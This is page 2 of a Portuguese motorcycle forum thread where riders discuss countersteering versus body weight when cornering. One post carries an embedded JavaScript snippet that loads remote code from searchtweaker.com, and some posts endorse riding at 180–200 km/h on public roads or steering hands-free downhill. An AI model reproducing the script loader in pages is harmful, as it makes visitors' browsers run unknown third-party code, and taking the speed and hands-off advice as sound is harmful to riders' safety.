InícioPortalÚltimas imagensRegistarEntrarquestão: forma correcta de curvar - Página 2 Lojaquestão: forma correcta de curvar - Página 2 V-deosquestão: forma correcta de curvar - Página 2 Fotos
questão: forma correcta de curvar - Página 2 Iy07r7

Novas mensagens
Encontrar as minhas mensagens
Tópicos sem resposta
Compartilhe
 

 questão: forma correcta de curvar

Ver o tópico anterior Ver o tópico seguinte Ir para baixo 
Ir à página : Anterior  1, 2, 3  Seguinte
AutorMensagem
Ruy
CBR 400RR
Ruy

Pendura : Sonia/Minimim :-P

Número de Mensagens : 502
Idade : 51
Localização : Lisboa
Mota/Modelo : Ex: CBR 1000/08 - Hayabusa K9
Data de inscrição : 30/03/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 25th 2014, 22:19

Kafka permite discordar pelo menos da 3.. Experimenta tu pores te em pé com a direccao direita e vê se a mota mexe muito ??
Ir para o topo Ir para baixo
FCruz
CBR 500R
FCruz

Pendura : Namorada xD

Número de Mensagens : 782
Idade : 34
Localização : Seia
Mota/Modelo : CBR 600 RR 08
Data de inscrição : 22/08/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 25th 2014, 22:29

A mota mexe, mas nao mexe o suficiente pra virar.
Ir para o topo Ir para baixo
Kichote
CBR 250R
Kichote

Pendura : Speed78

Número de Mensagens : 390
Idade : 40
Localização : Amarante
Mota/Modelo : Ex.:NINJA 300, CBR125r
Data de inscrição : 13/12/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 10:29

frutadaepoca escreveu:


eu percebo isso tudo que me dizes
mas falo concretamente de countersteering

actuas objectivamente no volante, ou achas que não e nem pensas nisso quando curvas?? lol

  Boas frutadaepoca! Vi o teu post logo quando o enviaste, mas não queria comentar como primeiro, pois achei que esta tarefa é para os outros users, com mais experiencia. Mas já agora que recebeste tantas respostas deixa-me partilhar a opinião do recém-encartado.
  Já tinha ouvido falar de countersteering antes de comprar a mota, mas na fase inicial, atrepalhava-me. Isto, há seis meses. Depois, no mes passado, tentei de novo (numa nacional com muitas curvas, piso bom e quase vazia) e já esta facil Very Happy  Consegui andar mais rapido nas mesmas curvas e sentir ainda mais agilidade. Ver esta diferença drástica na condução, era uma das experiencias mais positivas que tive os ultimos meses. 
 Dizem que na verdade não hã outra maneira de curvar(pois é a mota que quer alinhar as duas rodas nas curvas). Mas quando fazes curvar SÒ com o corpo, cansas-te mais, pois há menos força que assim se aplica no guiador e tem que ser recompensada pelo peso do corpo(a mota reage mais lento).
Aqui podes encontrar o resumo do "countersteering". 

http://www.viagemdemoto.com/index.php/dicas/367-praticando-o-contra-esterco-em-viagens-de-moto

 Como podes ver neste artigo (e tb no filme "Twist of the Wrist") o contra-esterço acontece sempre, não só apenas nas motas, mas em todos os veiculos de duas rodas. Até nas bicicletas das crianças, quando os pais  levantam as duas rodas auxiliares, criança já é obrigada a "lutar" com forças de alinhamento que provocam ziguezagues quando se quer virar. Mas em velocidades baixas, o countersteering não se aproveita, pois a correcção das forças é mais facil e as forças são mais fracas - ao virar o guiador por exemplo á esquerda nós nem notamos, ou notamos pouco, que houve pequena correcção das duas rodas á direita.

  E pra acabar vou usar uma metáfora. O countersteering é como RESPIRAR. No inicio não é preciso saber nada, nem aprender respirar pra viver. Depois podemos começar a respirar fundo, fazer o Yoga e musculação e assim aperfeiçoar o corpo em que andamos. Mas isto só depois de saber andar bem, sem ajuda dos pais, se não- caimos! 

Boas curvas!!! paz!  Very Happy


Última edição por Kichote em abril 26th 2014, 18:47, editado 6 vez(es)
Ir para o topo Ir para baixo
Pedras
CBR 400RR
Pedras

Pendura : you wish...vai a pé!!

Número de Mensagens : 564
Idade : 41
Localização : lisboa,Ponte de lima
Mota/Modelo : ex EN500 ex CBR600F3 exCBF600SA-Actual : CBR600F4I SPORT silver
Data de inscrição : 16/08/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 11:33

FCruz escreveu:
Pque é mais facil de entender a ver um video do que a ler , apesar de serem bons conselhos e estarem todos correctos, tenta arranjar este filme Keith Code Twist of the Wrist vol.2 (se souberes tirar da net por torrent é mais facil) e falam bastante do countersteering e como se deve curvar e outras coisas.

2x Rolling Eyes Se não tens quem te indique isto na estrada (colega ou conhecido) tira o filme quando o virem fas-t a estrada com calma e volta a ver o video e vice-versa ...so vendo o video e que vais comecar a percever o que nos estão a tentar explicar a nos dois (pois eu ainda ando a aprender a fazer curvas) Shocked
Ir para o topo Ir para baixo
tiagomdv
Honda Monkey
tiagomdv

Número de Mensagens : 79
Idade : 83
Localização : Leiria
Mota/Modelo : CBR 600F 92
Data de inscrição : 25/03/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 11:35

Ontem vi um bom video que demonstra que o uso em excesso do peso do corpo sem usar o counter-steering não é nem seguro nem eficaz.

Ir para o topo Ir para baixo
FCruz
CBR 500R
FCruz

Pendura : Namorada xD

Número de Mensagens : 782
Idade : 34
Localização : Seia
Mota/Modelo : CBR 600 RR 08
Data de inscrição : 22/08/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 12:06

ricardo.cbr600 escreveu:


2x Rolling Eyes Se não tens quem te indique isto na estrada (colega ou conhecido) tira o filme quando o virem fas-t a estrada com calma e volta a ver o video e vice-versa ...so vendo o video e que vais comecar a percever o que nos estão a tentar explicar a nos dois (pois eu ainda ando a aprender a fazer curvas) Shocked

O documentario ajudou-me bastante.
Ir para o topo Ir para baixo
Pedras
CBR 400RR
Pedras

Pendura : you wish...vai a pé!!

Número de Mensagens : 564
Idade : 41
Localização : lisboa,Ponte de lima
Mota/Modelo : ex EN500 ex CBR600F3 exCBF600SA-Actual : CBR600F4I SPORT silver
Data de inscrição : 16/08/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 12:19

eu Ja melhorei muito apos ter visto o filme ...mas continuo em melhoramentos..sem entrar em modos gp lol!  eu recomendo
Ir para o topo Ir para baixo
RicardoP
CBR 600F2
RicardoP

Número de Mensagens : 1967
Idade : 34
Localização : Portugal
Mota/Modelo : Kawasaki ZZR 1400
Data de inscrição : 05/02/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 12:36

é uma questão muuuuiiiito complicada e dá sempre pano para mangas... como já foi dito aqui há muita conversa de café e todos gostam de opinar...

o que sei que é verdade:

 "sair" da mota não é preciso até que se encontre uma curva em que, com o corpo fixo, a inclinação da mota seja demasiada para fazer a curva. sair da mota na prática tem a única vantagem de reduzir a inclinação necessária para fazer uma curva à mesma velocidade que faríamos sem movimentar o corpo, deste modo aumenta a superfície de contacto do pneu e torna a coisa mais segura

nós que andamos de mota por lazer PRECISAMOS de inclinar o corpo na maior parte do que fazemos?

não, porque não é todos os dias que se vai para a pista ou se apanha uma estrada que para alem de conhecermos nos faça precisar disso.

se devem?

por exemplo, no meu caso saio da mota em demasia e vou com o joelho ao chao mais vezes do que preciso, no entanto o sentir o joelho no chao dá-me a sensação de ligação alem de que me indica o quão a mota está inclinada, sei que naquela inclinação não caio.
sair da mota faz-me sentir seguro e que faço as curvas melhor por isso é que o faço mas sei que a menos que vá para a pista não preciso de o fazer para andar rápido. portanto se é o vosso caso força nisso. inclinem-se e pendurem-se para aí.

countersteering pode ajudar imenso a perceber como a mota faz uma curva mas chega a um ponto que não "interessa" porque sai naturalmente... a mota por si faz isso e uma pessoa preocupa-se mais em entrar bem na curva e no acelerador que com o resto.

Ruy, vou ter que discordar contigo quanto ao peso na peseira interior, podemos não ter noção mas a força que exercemos na peseira interior é mesmo muita (sem pensarmos nisso), o efeito que temos na mota ao aplicar o peso todo numa peseira como sabes não faz muito mas ajuda e o peso vai para lá naturalmente.

"Another advantage of weight shift is that a disproportionate amount of additional weight is automatically applied to the inside footpeg, which can help the bike turn."

quem me dera saber curvar como os "velhinhos" nas suas trails, super ligeiros e sem esforço, quem os conhece (e todos conhecemos alguém assim) têm uma coisa em comum, são suaves... e suave é rápido.

e outra coisa, pessoal se puderem passem numa pista, aquilo que podemos tirar de uma mota mas especialmente de nós na estrada e na pista são 2 coisas totalmente diferentes.

é como comparar a beira da estrada com a estrada da beira.

ah e o twist of the wrist devia ser obrigatório mesmo =)
Ir para o topo Ir para baixo
Pedras
CBR 400RR
Pedras

Pendura : you wish...vai a pé!!

Número de Mensagens : 564
Idade : 41
Localização : lisboa,Ponte de lima
Mota/Modelo : ex EN500 ex CBR600F3 exCBF600SA-Actual : CBR600F4I SPORT silver
Data de inscrição : 16/08/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 12:49

Eu conheço um velhinho de 1.65 com uma gs de malas laterais que numa tentativ de o acompanhar
fiquei mais burro ainda aquilo e que e curvar suave ate acho que ele tokou com as malas no asfalto
"e o meu heroi quando for grande quero ser assim" quando parei e vi o condutor da dita gs ate pus o dedo na boca pa chuchar...tamanhos ou idades não interesa e preciso conhecer a tecnica.
Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 60
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 14:54

Ruy escreveu:
Kafka permite discordar pelo menos da 3.. Experimenta tu pores te em pé com a direccao direita e vê se a mota mexe muito ??

Credo!!! Shocked  Pelo menos?? Rolling Eyes

Repara que eu estou a citar um artista que sabe andar de moto. Aliás esse livro está disponível aqui no fórum.

Evidentemente que das 4 formas a mais efetiva é a primeira, "CONTRA-VIRAR". relativamente à terceira posso dizer-te que já a testei. A descer retiras as mão dos guiador e consegues através do peso fazer com que a bichana vire. Pelo menos eu consegui.
IMPORTANTE: atenção ao peso da bicha! se for pesada, 200 e tais kilos este efeito é pouco efetivo! Na minha que pesa 178Kg+gasolina+(condutor) dá!
Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 60
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 15:07

FCruz escreveu:
A mota mexe, mas nao mexe o suficiente pra virar.

Boas agoara é que vi.
Ele tem uma hayabusa, que é mais pesada do que a nossa.
Na tua a 600 que ainda é mais leve podes virar usando qualquer das técnicas. No entanto a que te permite livrar de aflições é o CONTRA-VIRAR  com as mãos.
Ir para o topo Ir para baixo
rodrigues_victor
Honda Monkey
avatar

Número de Mensagens : 93
Idade : 39
Localização : Sao Joao da Madeira
Data de inscrição : 03/01/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 16:11

ricardo.cbr600 escreveu:
Eu conheço um velhinho de 1.65 com uma gs de malas laterais que numa tentativ de o acompanhar
fiquei mais burro ainda aquilo e que e curvar suave ate acho que ele tokou com as malas no asfalto
"e o meu heroi quando for grande quero ser assim" quando parei e vi o condutor da dita gs ate pus o dedo na boca pa chuchar...tamanhos ou idades não interesa e preciso conhecer a tecnica.

has de ver um video que circula na net de uma GS e uma S1000rr, em pista....é brutal como é k a GS curva tanto...
Ir para o topo Ir para baixo
4N70N10
CBR 250
4N70N10

Número de Mensagens : 246
Idade : 46
Localização : Azeitão/Karimun (Indonésia)
Mota/Modelo : CBR1000RR
Data de inscrição : 20/11/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 16:48

eh pessoal, o que é isso do contra-esterco?  lol! 
será um deflector de esterco novo?
ou é o novo pt-br do acordo ortográfico?
Ir para o topo Ir para baixo
Pedras
CBR 400RR
Pedras

Pendura : you wish...vai a pé!!

Número de Mensagens : 564
Idade : 41
Localização : lisboa,Ponte de lima
Mota/Modelo : ex EN500 ex CBR600F3 exCBF600SA-Actual : CBR600F4I SPORT silver
Data de inscrição : 16/08/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 26th 2014, 17:59

rodrigues_victor escreveu:


Comfirmado https://www.youtube.com/watch?v=peQaeU4O_pA eis o link
ao ver isto so apetece pegar na minha e fazer o contra-aparede para testar o enterro do corpo e testar o valanço do corpo na mota contra o asfalto.. Razz a brincar..este video tambem mostra muita tecnica
Ir para o topo Ir para baixo
frutadaepoca
Honda Monkey
frutadaepoca

Número de Mensagens : 31
Idade : 40
Localização : Aveiro
Mota/Modelo : cbr1000rr
Data de inscrição : 13/04/2014

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 19:34

obrigado a todos

imaginemos que vou inclinado em curva a direita a 180 ou 200 na minha faixa
vejo um carro na frente, ou seja um obstaculo entre mim e o meu ponto de referencia e tenho de alterar a trajetoria, como fazer? uso o guiador ou o corpo?

na situaçao acima e numa primeira fase eu tenho de alargar a trajetoria e depois tenho de inclinar para dentro novamente, e bastante para compensar a curva apertada pela trajetoria alargada.

devo servir-me do guiador para isto?
sinceramente parece-me que a curvar a 200 o corpo nao permite o "rigor" e a rapidez necessários ao controlo que preciso de ter para me sentir bem.

no entanto nao sei se a mota me responderia controladamente, e me permitiria literalmente controlar a inclinação só com o guiador.


obrigado malta!
Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 60
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 20:13

frutadaepoca escreveu:
obrigado a todos

imaginemos que vou inclinado em curva a direita a 180 ou 200 na minha faixa
vejo um carro na frente, ou seja um obstaculo entre mim e o meu ponto de referencia e tenho de alterar a trajetoria, como fazer? uso o guiador ou o corpo?

na situaçao acima e numa primeira fase eu tenho de alargar a trajetoria e depois tenho de inclinar para dentro novamente, e bastante para compensar a curva apertada pela trajetoria alargada.

devo servir-me do guiador para isto?
sinceramente parece-me que a curvar a 200 o corpo nao permite o "rigor" e a rapidez necessários ao controlo que preciso de ter para me sentir bem.

no entanto nao sei se a mota me responderia controladamente, e me permitiria literalmente controlar a inclinação só com o guiador.


obrigado malta
Eu uso somente o guiador. O corpo vai atrás! Muitíssimo mais rápido! A conduzir no meio do trânsito ninguém te apanha!!!! Wink

Se mandas o corpo primeiro fazes a curva lentamente.  No 

Imagina que vais a curvar e a meio reparas que a curva fecha mais do que inicialmente pensavas. Se usares o corpo vais demorar a reagir e entretanto a moto sai de frente. Vários videos na net exemplificam espalhanços por "azelhice". No meu ponto de vista corrigiam-se com esta técnica.

Já agora, uso esta técnica do "contra-virar" traduzido de "countersteering", há mais de 20 anos. Li a sua descrição pela primeira vez numa revista inglesa em 1993. Demorei algum tempo e depois por acaso forcei e fiquei espantado com a sua simplicidade.
Tal como os comentários atuais de alguns mais "resistentes" também na altura ousei comentar isso com alguns motards da velha guarda. Resultado cairam-me em cima gozando-me dizendo que era louco e o diabo a quatro.
O que é certo é que tinha uma pasteleira de uma moto grande e pesada, Yamaha GTS e a curvar na AE dava ratada aos ninja 900, e outras desportivas... No final ficavam admirados encolhiam os ombros e acabava por só ter amigos pás voltas 1 vez. À segunda já não dava pica!

Recomendo, faço votos que a treines e divulgues a sua importância. quanto mais gente a dominar menos gente vai cair com certeza! fixe! 

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Ir para o topo Ir para baixo
frutadaepoca
Honda Monkey
frutadaepoca

Número de Mensagens : 31
Idade : 40
Localização : Aveiro
Mota/Modelo : cbr1000rr
Data de inscrição : 13/04/2014

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 20:27

obrigado kafka

portanto na tua opiniao, como me parece a mim, devo preocupar-me em aprender bem a reacçao da mota ao guiador para inclinar, certo?
isso sim é o importante de perceber para se curvar em segurança, e nao o peso do corpo que naturalmente se vai adaptar, certo?

eu ate acho que so faz sentido sair muito da mota se for para a ajudar a ter equilibrio e estabilidade com as inclinaçoes que lhe damos com o guiador!!... certo?

heheheheh

abc
Ir para o topo Ir para baixo
Ruy
CBR 400RR
Ruy

Pendura : Sonia/Minimim :-P

Número de Mensagens : 502
Idade : 51
Localização : Lisboa
Mota/Modelo : Ex: CBR 1000/08 - Hayabusa K9
Data de inscrição : 30/03/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 22:00

O sair da mota é só uma nalga, e o counterstering funciona SEMPRE EM TODAS AS OCASIÕES...
Ir para o topo Ir para baixo
Kafka
CBR 400
Kafka

Pendura : -te

Número de Mensagens : 481
Idade : 60
Localização : Home
Mota/Modelo : 1000rr-11
Data de inscrição : 17/07/2012

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 22:38

frutadaepoca escreveu:
obrigado kafka

portanto na tua opiniao, como me parece a mim, devo preocupar-me em aprender bem a reacçao da mota ao guiador para inclinar, certo?
R: Certo!
isso sim é o importante de perceber para se curvar em segurança, e nao o peso do corpo que naturalmente se vai adaptar, certo?
R:Certo

eu ate acho que so faz sentido sair muito da mota se for para a ajudar a ter equilibrio e estabilidade com as inclinaçoes que lhe damos com o guiador!!... certo?
R: É outra dimensão. Primeiro treinas a cena do guiador (a andares regularmente demoras uns tempitos até te sair aumomático em caso de emergência). Numa segunda fase vais adaptar a cena do corpo para conseguires ainda curvar mais além com o guiador! Numa terceira fase adaptas as duas e tás a mandar-te com o joelho a raspar no chão, se tiveres um local que permita o seu treino!

heheheheh
R: Duplo hehehehee
abc
Ir para o topo Ir para baixo
Nuno.CBR
CBR 600F3
Nuno.CBR

Número de Mensagens : 2123
Idade : 42
Localização : Costa de Caparica
Mota/Modelo : Hornet 2011; Ex CBR500RA 2013
Data de inscrição : 04/05/2013

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 28th 2014, 23:28

FCruz escreveu:
Pque é mais facil de entender a ver um video do que a ler , apesar de serem bons conselhos e estarem todos correctos, tenta arranjar este filme Keith Code Twist of the Wrist vol.2 (se souberes tirar da net por torrent é mais facil) e falam bastante do countersteering e como se deve curvar e outras coisas.
Nem Mais  fixe! 
Já foi postado por cá, mas nunca é de mais:

Ir para o topo Ir para baixo
frutadaepoca
Honda Monkey
frutadaepoca

Número de Mensagens : 31
Idade : 40
Localização : Aveiro
Mota/Modelo : cbr1000rr
Data de inscrição : 13/04/2014

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 29th 2014, 08:34

obrigado a todos mais uma vez!

 fixe!
Ir para o topo Ir para baixo
AjnSantiago
CBR 600F
AjnSantiago

Número de Mensagens : 1156
Idade : 41
Localização : Porto
Data de inscrição : 15/12/2011

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 29th 2014, 09:08

Estás com muitas dúvidas que no decorrer da experiência vão desvanecer..
Em suma, não uses o corpo, não vais conseguir fazer nada do que queres e ainda te atrapalhas, sempre guiador.
Faz km, as coisas depois ficam mais fáceis Smile

abr
Ir para o topo Ir para baixo
MotardFeio
CBR 600F4i
MotardFeio

Número de Mensagens : 3610
Idade : 20
Localização : Margem Sul
Mota/Modelo : CBR XX
Data de inscrição : 12/03/2014

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 29th 2014, 09:42

Aqui está um tópico porreiro!

Com a minha "levezinha" a contra-brecagem funciona às mil maravilhas!

É a forma mais fácil e rápida de actuar para mudanças de direcção!
Ir para o topo Ir para baixo
jam
CBR 900RR
jam

Pendura : Anda na moto dela

Número de Mensagens : 12297
Idade : 64
Localização : porto
Mota/Modelo : 2012 CBR 1000 RA
Data de inscrição : 16/02/2009

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimeabril 29th 2014, 12:34

E já agora uma coisa importante que nos esquecemos com frequência.

Cair faz parte da nossa vida.
Imagina-te a cair e o que deves e o que não deves fazer para minimizar os estragos no corpo.
Ir para o topo Ir para baixo
https://www.cbrportugal.com
joaomidias
Honda Monkey
joaomidias

Número de Mensagens : 21
Idade : 41
Localização : Aveiro
Mota/Modelo : Cbr 600 RR
Data de inscrição : 15/01/2010

questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitimemaio 25th 2014, 20:21

O countersteering acaba por não ser uma técnica, porque todos a usamos sem nos apercebermos, certo? Até numa bicicleta, é a maneira de virar um veiculo de 2 rodas. Bom tópico, se tentarmos virar o guiador para o lado da curva ela vira para o outro, acho que toda a gente o faz, apenas não sabe que se chama assim, conheço o contersteering dos carros mas não tem nada a ver com os veículos de 2 rodas, fiquei elucidado.
Ir para o topo Ir para baixo
Conteúdo patrocinado




questão: forma correcta de curvar - Página 2 Empty
MensagemAssunto: Re: questão: forma correcta de curvar questão: forma correcta de curvar - Página 2 Icon_minitime

Ir para o topo Ir para baixo
 

questão: forma correcta de curvar

Ver o tópico anterior Ver o tópico seguinte Ir para o topo 
Página 2 de 3Ir à página : Anterior  1, 2, 3  Seguinte

 Tópicos semelhantes

-
» Protecção coluna, Posição correcta
» HORA CORRECTA PARA TOMAR AGUA
» Forma a tua frase
» Botas Forma Mirage
» Botas Forma Nero

Permissões neste sub-fórumNão podes responder a tópicos
CBRportugal | Comunidade Motard :: GERAL :: Técnicas de condução-